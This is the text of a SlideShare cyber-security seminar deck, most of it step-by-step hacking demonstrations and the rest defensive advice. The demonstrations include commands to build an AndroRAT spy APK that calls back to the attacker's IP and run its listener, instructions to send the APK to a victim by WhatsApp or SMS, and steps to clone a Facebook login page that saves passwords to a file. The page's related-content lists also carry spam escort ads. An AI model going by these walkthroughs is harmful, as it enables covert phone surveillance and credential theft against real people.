SlideShare a Scribd company logo

Cyber_Security_Seminar_PPTs_to Upload.pptx

Download as PPTX, PDF
D
DrMajidMumtaz

Ethical Hacking, Hands on Practice, Pen Testing, Penetration, Mobile hacking

Technology
1 of 48
Cyber Security / Ethical Hacking / Penetration Testing
Presentation Contents • Cyber Security /Ethical Hacking / Pen Testing • Threats: • Hacking • Malware • Phishing • Mobile Phone Hack • Attack Background • Android Hacking using AndroRAT • Practical Demonstration • Windows 10 Hack • Attack Background • Password Hack • Whole System Control • Practical Demonstration • Ransomware Attack • Background • Practical Demonstration • References
What is Cyber Security / Ethical hacking / penetration testing? Cyber Security: • It is related to characteristic of digital devices like computer, information technology, virtual reality, image processing, AI based automation solutions. • Security is the combination of Confidentiality, Integrity, Availability (CIA) triangle. Ethical Hacking • A set of high professional morals & principles. • Attempt to gain unauthorized access to a computer system, application or data. Penetration Testing • It is security exercise where a cyber-security expert attempts to find and exploit vulnerabilities in a digital equipment. • Like social media hacking, mobile hacking, Ransomware and others attacks.
01 ANALYSIS 02 LOGISTICS 03 PRODUCT 04 PROFIT 07 PLAN 06 PROCURE- MENT 08 MANAGE- MENT 05 DETERMINA- TION
Why and Who is doing hacking? • Financial (theft, fraud, blackmail) • Political /state (state level/ military) • Fame/ kudos (fun/ status) • Hacktivism (cause) • Pen testers (legal hacking) • Police/ FIA cyber crime division • Insider • Business
Mobile Hacking (Note : Only For Educational Purpose.) • Pre-requiste for Mobile Hacking: • Github installed • Python3 installed • Java installed • Local Machine (PC) IP address • Linux/Osx System
Mobile Hacking (Note : Only For Educational Purpose.) • Attack using AndroRAT: • A Tool used to control Android phone remotely • Client/Server application • Client-Side developed in Java language • Server is developed in Python • Windows/Linux/Osx System
Mobile Hacking (Note : Only For Educational Purpose.) • Step 1: Clone the repository from GitHub: • A following command should be used to clone the Git repository. Git clone https://github.com/karma9874/AndroRAT.git • Step 2: open the cloned repository in cmd/terminal cd <Directory_name> AndroRAT • Step 3: Installing necessary Libraries using PIP tool pip install –r requirements.txt
Mobile Hacking (Note : Only For Educational Purpose.) • Step 4: Building Malicious apk file for spying Cell phone: • A following command should be used to build the apk file. python3 androRAT.py - -build –i <your_IP_Address> -p 8089 –o <apk_name>.apk Find IP Address: Use ipconfig /all or ifconfig on cmd/terminal. • Step 5: Host the Listener as follows: python3 androRAT.py –shell –I 0.0.0.0 –p 8089 • Step 6: Open another terminal/cmd and run WebServer sudo apachectl start
Mobile Hacking (Note : Only For Educational Purpose.) • Send generated Android .apk file to Victim cell via email link, WhatsApp, SMS link etc. The victim will download it and install it as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • Send generated Android .apk file to Victim cell via appending/email link, WhatsApp, SMS link etc. The victim will download it and install it as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • On Hacker side the following shell will appear and wait for listening connection:
Mobile Hacking (Note : Only For Educational Purpose.) • When victim install apk on their cell the following screenshot shows that a connection established (IP address appears):
Mobile Hacking (Note : Only For Educational Purpose.) • When victim install apk on their cell the following screenshot shows that a connection established (IP address appears): write help will show the command to use victim cell data. The installed apk hide it, no icons can seen on the screen
Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo shows the device information as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo and camList shows the information as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo and camList shows the information as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo camList, takepic and vibrate shows as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo, camList, ip shows Output as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • The output of SIM information as follows:
Social Media Hack (Facebook, Twitter, Instagram etc.) • Background: Client/Server Architecture Clients Server 1. Client side Threats 2. Server side Threats 3. Network Threats
Social Media Hack (Facebook, Twitter, Instagram etc.) Email Spoofing & Phishing Attack • Uses a fake email address or simulates a genuine one in order to deceive user • Redirect user to webpage that looks like a social media page • Records the login information inputted, may attempt to download malware or perform XSS • According to Kapersky 1 in 5 Phishing Scams include Facebook Hacking FB Accounts Using Tabnapping.
Social Media Hack (Facebook, Twitter, Instagram etc.) • Domain Name System (DNS): In Simple World • DNS map the Host Name with IP address, There are 13-root name servers in the world. DNS are placed on different regions world-wide. Host name ping as follows:
Social Media Hack (Facebook, Twitter, Instagram etc.) • In Windows, the file will be located under C:WindowsSystem32driversetc.
Social Media Hack (Facebook, Twitter, Instagram etc.) • WireShark tool is used to capture packets. let's see the traffic on the packet level: We have an IP address of 192.168.10.19, which is the IP address of our attacker
Social Media Hack (Facebook, Twitter, Instagram etc.) • Facebook password phishing Step by Step Step 1: First, we need to set up a phishing page. first open your browser and navigate to the Facebook login page. Then, on the browser menu, click on File and then on Save page as.... Then, make sure that you choose a complete page from the drop-down menu. The output should be an .html file. Rename the Facebook HTML page index.html. Step 2: Inside this HTML, we have to change the login form. If you search for action=, you will see it. Here, we change the login form to redirect the request into a custom PHP page called login.php. Also, we have to change the request method to GET instead of POST.
Social Media Hack (Facebook, Twitter, Instagram etc.) • Facebook password phishing Step by Step Step 3: Next, we will create the passwords.txt file, where the target credentials will be stored. Step 4: Now, we will copy all of these files into varwww and start the Apache services. If we open the index.html page locally, we will see that this is the phishing page that the target will see. Open the browser and navigate to http://www.facebook.com/: Now, log into your Facebook account using your username and password. and jump on the folder and see if we get anything on the passwords.txt file.
Social Media Hack (Facebook, Twitter, Instagram etc.) • Countermeasures Securing the online account
Social Media Hack (Facebook, Twitter, Instagram etc.) • Countermeasures Securing the online account • Don’t click any links on an email unless you can guarantee who its from. • Use a trusted method of contacting the company via a phone number, app or website. • Mark the email as spam and contact the organisation.
Ransomware Attack Background • Normally loaded onto a computer via a download/attachment/link from an email or website. • Will either lock the screen or encrypt your data. • Once Ransomware is uploaded on your computer/tablet/phone it is very difficult to remove without removing all of the data • Wannacry attack 2017 - One of the biggest cyber attacks to occur. • Is said to have hit 300,000 computers in 150 countries. • Companies affected include; K-electric, Life insurance company, NHS, Renault, FedEx, Spanish telecoms and gas companies, German railways etc. An Hacker Encrypt your data and demand ransom in the form of Bitcoins to decrypt back.
Ransomware • More than a third of NHS trusts in England and Wales were affected with over 6,800 operations cancelled. The virus is spread through a vulnerability in the Windows OS known as “Eternal Blue,” .
Ransomware • More than a third of NHS trusts in England and Wales were affected with over 6,800 operations cancelled. The virus is spread through a vulnerability in the Windows OS known as “Eternal Blue,” .
Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows:
Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows:
Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows: Output after Encryption, the file inside the folder can’t be readable.
Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows: Output after decryption operation, the file inside the folder can be readable now.
Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows: Output after decryption operation, the file inside the folder can be readable again.
How to tackle Ransomware • Back up- Keep a backed up copy of your data. Ensure its not permanently connected to the network. • Patch- Keep your software up to date. Wannacry was successful as those affected computers hadn’t updated. The update contained a fix for the problem. • Attachments- Don’t click on links from emails/SMS as this could easily be from an untrusted source and contain malware like Ransomware
Public Wi-Fi • May not be trustworthy. They could share your information to other companies who operate in countries without any data protection. • You may not know who is watching you whilst you’re online. What to do and not do to • Don’t use online banking. Use your own data. • Don’t conduct any purchases • Use a virtual private network (VPN)
CYBER SECURITY Tips Tips for protecting yourself from cybersecurity threats in 2023: Password Policy Use strong passwords and change them regularly. Information Sharing vigilant Be careful about what information you share online. Firewall and Antivirus Install a firewall and antivirus software. Systems & software Keep your systems and software up to date. Unknown link and Attachments Don't click on links or open attachments from unknown senders. Data Backup Back up your data regularly. Lastly be aware of the latest cybersecurity threats.
Passwords Advice • Use 1 password per account. • Three random words use. Like Capitals, special characters and numbers is your own choice. • If you follow this advice your passwords security will be significantly increased against a brute force attack. • Password managers can be helpful to store your passwords.
Advice • In the physical world we’re good at protecting ourselves and our property, we need to replicate this in the digital world. • 80% of cyber-crime is preventable.
Advice • Update and migrate • Activate your firewall • Staff awareness • Data encryption • User accounts privileges i.e admin • Cyber insurance • Prepare Plan
You are the best defence! • Technology is only a small part of Cyber Defence • You are the most important person – protect yourself • For any businesses the most important and best defence is Cyber Security Aware employees – train your staff Always be aware! Always be on your guard! THANK YOU

Recommended

Hacking by Pratyush Gupta
Hacking by Pratyush GuptaHacking by Pratyush Gupta
Hacking by Pratyush GuptaTenet Systems Pvt Ltd
 
Hacking tutorial
Hacking tutorialHacking tutorial
Hacking tutorialMSA Technosoft
 
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECTHACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECTDHRUV562167
 
Computer Security Threats
Computer Security ThreatsComputer Security Threats
Computer Security ThreatsQuick Heal Technologies Ltd.
 
ICT Security.pdf
ICT Security.pdfICT Security.pdf
ICT Security.pdfJoeMarieDormido2
 
Hacking
HackingHacking
Hackingrameswara reddy venkat
 
Hacking
HackingHacking
HackingRoshan Chaudhary
 
Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9Geoff Pesimo
 

Recommended

Hacking by Pratyush Gupta
Hacking by Pratyush GuptaHacking by Pratyush Gupta
Hacking by Pratyush GuptaTenet Systems Pvt Ltd
 
Hacking tutorial
Hacking tutorialHacking tutorial
Hacking tutorialMSA Technosoft
 
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECTHACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECTDHRUV562167
 
Computer Security Threats
Computer Security ThreatsComputer Security Threats
Computer Security ThreatsQuick Heal Technologies Ltd.
 
ICT Security.pdf
ICT Security.pdfICT Security.pdf
ICT Security.pdfJoeMarieDormido2
 
Hacking
HackingHacking
Hackingrameswara reddy venkat
 
Hacking
HackingHacking
HackingRoshan Chaudhary
 
Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9Geoff Pesimo
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKINGNAWAZ KHAN
 
CS155 Computer Security at Stanford University
CS155 Computer Security at Stanford UniversityCS155 Computer Security at Stanford University
CS155 Computer Security at Stanford UniversityRick Patterson
 
Ethical hacking is a based on computer hacking
Ethical hacking is a based on computer hackingEthical hacking is a based on computer hacking
Ethical hacking is a based on computer hackingsxkkjbzq2k
 
31.ppt
31.ppt31.ppt
31.pptssuserec53e73
 
31.ppt
31.ppt31.ppt
31.pptKarmanChandi
 
Cyber crime
Cyber crimeCyber crime
Cyber crimeSalma Zafar
 
hacking
hackinghacking
hackingADAIKKAPPANS1
 
computer_security.ppt
computer_security.pptcomputer_security.ppt
computer_security.pptAsif Raza
 
Hacking In Detail
Hacking In DetailHacking In Detail
Hacking In DetailGreater Noida Institute Of Technology
 
Hacking By Nirmal
Hacking By NirmalHacking By Nirmal
Hacking By NirmalNIRMAL RAJ
 
Cyber security awareness presentation nepal
Cyber security awareness presentation nepalCyber security awareness presentation nepal
Cyber security awareness presentation nepalICT Frame Magazine Pvt. Ltd.
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Securitybelsis
 
Cyber attacks 101
Cyber attacks 101Cyber attacks 101
Cyber attacks 101Rafel Ivgi
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedfangjiafu
 
Hacking intro
Hacking introHacking intro
Hacking introMilind Mishra
 
Advanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementAdvanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementMayur Nanotkar
 
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)Avansa Mid- en Zuidwest
 
Hacking and Cyber Security.
Hacking and Cyber Security.Hacking and Cyber Security.
Hacking and Cyber Security.Kalpesh Doru
 
Workshop on Cyber security and investigation
Workshop on Cyber security and investigationWorkshop on Cyber security and investigation
Workshop on Cyber security and investigationMehedi Hasan
 
Wfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security InnovationWfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security InnovationPriyanka Aash
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 

More Related Content

Similar to Cyber_Security_Seminar_PPTs_to Upload.pptx

ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKINGNAWAZ KHAN
 
CS155 Computer Security at Stanford University
CS155 Computer Security at Stanford UniversityCS155 Computer Security at Stanford University
CS155 Computer Security at Stanford UniversityRick Patterson
 
Ethical hacking is a based on computer hacking
Ethical hacking is a based on computer hackingEthical hacking is a based on computer hacking
Ethical hacking is a based on computer hackingsxkkjbzq2k
 
computer_security.ppt
computer_security.pptcomputer_security.ppt
computer_security.pptAsif Raza
 
Hacking By Nirmal
Hacking By NirmalHacking By Nirmal
Hacking By NirmalNIRMAL RAJ
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Securitybelsis
 
Cyber attacks 101
Cyber attacks 101Cyber attacks 101
Cyber attacks 101Rafel Ivgi
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedfangjiafu
 
Advanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementAdvanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementMayur Nanotkar
 
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)Avansa Mid- en Zuidwest
 
Hacking and Cyber Security.
Hacking and Cyber Security.Hacking and Cyber Security.
Hacking and Cyber Security.Kalpesh Doru
 
Workshop on Cyber security and investigation
Workshop on Cyber security and investigationWorkshop on Cyber security and investigation
Workshop on Cyber security and investigationMehedi Hasan
 
Wfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security InnovationWfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security InnovationPriyanka Aash
 

Similar to Cyber_Security_Seminar_PPTs_to Upload.pptx (20)

ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKING
 
CS155 Computer Security at Stanford University
CS155 Computer Security at Stanford UniversityCS155 Computer Security at Stanford University
CS155 Computer Security at Stanford University
 
Ethical hacking is a based on computer hacking
Ethical hacking is a based on computer hackingEthical hacking is a based on computer hacking
Ethical hacking is a based on computer hacking
 
31.ppt
31.ppt31.ppt
31.ppt
 
31.ppt
31.ppt31.ppt
31.ppt
 
Cyber crime
Cyber crimeCyber crime
Cyber crime
 
hacking
hackinghacking
hacking
 
computer_security.ppt
computer_security.pptcomputer_security.ppt
computer_security.ppt
 
Hacking In Detail
Hacking In DetailHacking In Detail
Hacking In Detail
 
Hacking By Nirmal
Hacking By NirmalHacking By Nirmal
Hacking By Nirmal
 
Cyber security awareness presentation nepal
Cyber security awareness presentation nepalCyber security awareness presentation nepal
Cyber security awareness presentation nepal
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
 
Cyber attacks 101
Cyber attacks 101Cyber attacks 101
Cyber attacks 101
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
 
Hacking intro
Hacking introHacking intro
Hacking intro
 
Advanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementAdvanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security Management
 
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
 
Hacking and Cyber Security.
Hacking and Cyber Security.Hacking and Cyber Security.
Hacking and Cyber Security.
 
Workshop on Cyber security and investigation
Workshop on Cyber security and investigationWorkshop on Cyber security and investigation
Workshop on Cyber security and investigation
 
Wfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security InnovationWfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security Innovation
 

Recently uploaded

Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsRoshan Dwivedi
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 

Recently uploaded (20)

Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 

Cyber_Security_Seminar_PPTs_to Upload.pptx

  • 1. Cyber Security / Ethical Hacking / Penetration Testing
  • 2. Presentation Contents • Cyber Security /Ethical Hacking / Pen Testing • Threats: • Hacking • Malware • Phishing • Mobile Phone Hack • Attack Background • Android Hacking using AndroRAT • Practical Demonstration • Windows 10 Hack • Attack Background • Password Hack • Whole System Control • Practical Demonstration • Ransomware Attack • Background • Practical Demonstration • References
  • 3. What is Cyber Security / Ethical hacking / penetration testing? Cyber Security: • It is related to characteristic of digital devices like computer, information technology, virtual reality, image processing, AI based automation solutions. • Security is the combination of Confidentiality, Integrity, Availability (CIA) triangle. Ethical Hacking • A set of high professional morals & principles. • Attempt to gain unauthorized access to a computer system, application or data. Penetration Testing • It is security exercise where a cyber-security expert attempts to find and exploit vulnerabilities in a digital equipment. • Like social media hacking, mobile hacking, Ransomware and others attacks.
  • 5. Why and Who is doing hacking? • Financial (theft, fraud, blackmail) • Political /state (state level/ military) • Fame/ kudos (fun/ status) • Hacktivism (cause) • Pen testers (legal hacking) • Police/ FIA cyber crime division • Insider • Business
  • 6. Mobile Hacking (Note : Only For Educational Purpose.) • Pre-requiste for Mobile Hacking: • Github installed • Python3 installed • Java installed • Local Machine (PC) IP address • Linux/Osx System
  • 7. Mobile Hacking (Note : Only For Educational Purpose.) • Attack using AndroRAT: • A Tool used to control Android phone remotely • Client/Server application • Client-Side developed in Java language • Server is developed in Python • Windows/Linux/Osx System
  • 8. Mobile Hacking (Note : Only For Educational Purpose.) • Step 1: Clone the repository from GitHub: • A following command should be used to clone the Git repository. Git clone https://github.com/karma9874/AndroRAT.git • Step 2: open the cloned repository in cmd/terminal cd <Directory_name> AndroRAT • Step 3: Installing necessary Libraries using PIP tool pip install –r requirements.txt
  • 9. Mobile Hacking (Note : Only For Educational Purpose.) • Step 4: Building Malicious apk file for spying Cell phone: • A following command should be used to build the apk file. python3 androRAT.py - -build –i <your_IP_Address> -p 8089 –o <apk_name>.apk Find IP Address: Use ipconfig /all or ifconfig on cmd/terminal. • Step 5: Host the Listener as follows: python3 androRAT.py –shell –I 0.0.0.0 –p 8089 • Step 6: Open another terminal/cmd and run WebServer sudo apachectl start
  • 10. Mobile Hacking (Note : Only For Educational Purpose.) • Send generated Android .apk file to Victim cell via email link, WhatsApp, SMS link etc. The victim will download it and install it as follows:
